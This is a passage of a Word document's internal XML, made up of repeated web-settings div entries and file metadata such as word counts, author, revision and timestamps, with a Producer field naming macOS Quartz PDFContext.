        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1891378881">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1902669883">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1921282966">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1944143271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1958559871">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1965771102">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1969776440">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2007855831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2021396341">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2039770700">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045207735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2052336083">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2113746141">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21207588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2690</Words>
  <Characters>15333</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>127</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Dastan Alseit</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2026-05-11T13:09:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-18T01:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T01:42:00Z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2026-05-06T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2026-05-11T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>macOS Версия 15.6.1 (Выпуск 24G90) Quartz PDFContext</vt:lpwstr>
  </property>
</Properties>
</file>